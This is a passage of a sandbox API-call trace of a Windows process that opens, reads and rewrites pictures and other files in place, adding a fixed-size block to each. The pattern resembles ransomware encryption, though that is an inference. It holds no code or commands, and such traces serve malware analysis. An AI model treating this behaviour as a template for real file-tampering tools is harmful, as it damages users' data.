lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0064.682] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x107e [0064.682] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0064.682] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.682] ReleaseMutex (hMutex=0x168) returned 1 [0064.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HandPrints.jpg", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0064.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HandPrints.jpg", cchWideChar=14, lpMultiByteStr=0x1f7358c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HandPrints.jpg", lpUsedDefaultChar=0x0) returned 14 [0064.682] ReadFile (in: hFile=0x1bc, lpBuffer=0x2663a38, nNumberOfBytesToRead=0x107e, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663a38*, lpNumberOfBytesRead=0x311f2bc*=0x107e, lpOverlapped=0x0) returned 1 [0064.691] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0064.691] WriteFile (in: hFile=0x1bc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1606, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x311f2d0*=0x1606, lpOverlapped=0x0) returned 1 [0064.692] CloseHandle (hObject=0x1bc) returned 1 [0065.261] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5KV2W3L69- l7u9zN7\\YgAY0.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\5kv2w3l69- l7u9zn7\\ygay0.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0065.281] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0065.281] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xe140 [0065.281] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0065.281] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.286] ReleaseMutex (hMutex=0x168) returned 1 [0065.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YgAY0.jpg", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0065.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YgAY0.jpg", cchWideChar=9, lpMultiByteStr=0x1f733cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YgAY0.jpg", lpUsedDefaultChar=0x0) returned 9 [0065.287] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0065.316] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xd140 [0065.316] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.328] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xd140 [0065.328] WriteFile (in: hFile=0x1fc, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.329] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0065.329] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0065.329] CloseHandle (hObject=0x1fc) returned 1 [0065.343] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0065.344] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0065.344] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x13fb [0065.344] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0065.344] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.344] ReleaseMutex (hMutex=0x168) returned 1 [0065.344] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Peacock.jpg", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0065.344] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Peacock.jpg", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Peacock.jpg", lpUsedDefaultChar=0x0) returned 11 [0065.344] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x13fb, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x311f2bc*=0x13fb, lpOverlapped=0x0) returned 1 [0065.347] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0065.347] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1983, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x311f2d0*=0x1983, lpOverlapped=0x0) returned 1 [0065.347] CloseHandle (hObject=0x1fc) returned 1 [0065.354] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0065.355] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0065.355] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xbd616 [0065.355] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0065.355] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.355] ReleaseMutex (hMutex=0x168) returned 1 [0065.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Jellyfish.jpg", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0065.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Jellyfish.jpg", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Jellyfish.jpg", lpUsedDefaultChar=0x0) returned 13 [0065.355] ReadFile (in: hFile=0x1fc, lpBuffer=0x2874088, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.358] ReadFile (in: hFile=0x1fc, lpBuffer=0x2874088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.610] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xbc616 [0065.610] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.614] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xbc616 [0065.615] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea92b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea92b8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.615] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0065.615] WriteFile (in: hFile=0x1fc, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0065.616] WriteFile (in: hFile=0x1fc, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0065.616] CloseHandle (hObject=0x1fc) returned 1 [0065.964] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0065.965] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0065.965] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x78e4 [0065.965] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0065.965] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.965] ReleaseMutex (hMutex=0x168) returned 1 [0065.965] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Informix.xsl", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0065.965] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Informix.xsl", cchWideChar=12, lpMultiByteStr=0x1f7320c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Informix.xsl", lpUsedDefaultChar=0x0) returned 12 [0065.965] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.970] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x68e4 [0065.970] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.971] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x68e4 [0065.971] WriteFile (in: hFile=0x1fc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.972] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0065.972] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0065.972] CloseHandle (hObject=0x1fc) returned 1 [0065.976] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe" (normalized: "c:\\program files\\microsoft analysis services\\spcwin.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.976] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe", lpFilePart=0x311f690*="spcwin.exe") returned 0x37 [0065.976] GetLastError () returned 0x20 [0065.977] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="洀i̑폈H̑퐔H̑L̑꩐Ƿ\x01") returned 0x51 [0065.977] LocalFree (hMem=0x696d00) returned 0x0 [0065.977] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0065.977] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0065.977] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0065.977] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0065.977] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe" (normalized: "c:\\program files\\microsoft analysis services\\spcwin.exe")) returned 0x20 [0065.978] CreateFileW (lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.5\\workflow.targets"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.979] GetFullPathNameW (in: lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets", lpFilePart=0x311f690*="Workflow.Targets") returned 0x54 [0065.979] GetLastError () returned 0x5 [0065.979] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑꩐Ƿ\x01") returned 0x13 [0065.979] LocalFree (hMem=0x69e2b0) returned 0x0 [0065.979] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0065.979] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0065.980] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0065.980] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0065.980] GetFileAttributesW (lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.5\\workflow.targets")) returned 0x20 [0065.981] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui" (normalized: "c:\\program files\\windows journal\\en-us\\nbmaptip.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.284] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui", lpFilePart=0x311f690*="NBMapTIP.dll.mui") returned 0x37 [0066.284] GetLastError () returned 0x5 [0066.284] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑꩐Ƿ\x01") returned 0x13 [0066.284] LocalFree (hMem=0x69e2b0) returned 0x0 [0066.284] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0066.285] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0066.285] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0066.285] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0066.285] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui" (normalized: "c:\\program files\\windows journal\\en-us\\nbmaptip.dll.mui")) returned 0x20 [0066.595] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Graph.jtp" (normalized: "c:\\program files\\windows journal\\templates\\graph.jtp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.721] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Graph.jtp", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files\\Windows Journal\\Templates\\Graph.jtp", lpFilePart=0x311f690*="Graph.jtp") returned 0x34 [0066.721] GetLastError () returned 0x5 [0066.721] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑꧰Ƿ\x01") returned 0x13 [0066.721] LocalFree (hMem=0x69e2b0) returned 0x0 [0066.721] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0066.721] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0066.722] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0066.722] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0066.722] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Graph.jtp" (normalized: "c:\\program files\\windows journal\\templates\\graph.jtp")) returned 0x20 [0066.922] CreateFileW (lpFileName="C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui" (normalized: "c:\\program files\\windows mail\\en-us\\msoeres.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.923] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui", lpFilePart=0x311f690*="msoeres.dll.mui") returned 0x33 [0066.923] GetLastError () returned 0x5 [0066.923] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑꧰Ƿ\x01") returned 0x13 [0066.923] LocalFree (hMem=0x69e2b0) returned 0x0 [0066.923] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0066.923] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0066.924] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0066.924] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0066.924] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui" (normalized: "c:\\program files\\windows mail\\en-us\\msoeres.dll.mui")) returned 0x20 [0066.925] CreateFileW (lpFileName="C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui" (normalized: "c:\\program files\\windows photo viewer\\en-us\\photoviewer.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.671] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui", lpFilePart=0x311f690*="PhotoViewer.dll.mui") returned 0x3f [0067.671] GetLastError () returned 0x5 [0067.671] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑꧰Ƿ\x01") returned 0x13 [0067.671] LocalFree (hMem=0x69e2b0) returned 0x0 [0067.671] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0067.671] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0067.672] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0067.672] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0067.672] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui" (normalized: "c:\\program files\\windows photo viewer\\en-us\\photoviewer.dll.mui")) returned 0x20 [0067.674] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\berime.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0069.111] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0069.111] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x42ba [0069.112] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0069.112] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.112] ReleaseMutex (hMutex=0x168) returned 1 [0069.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Berime.htm", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 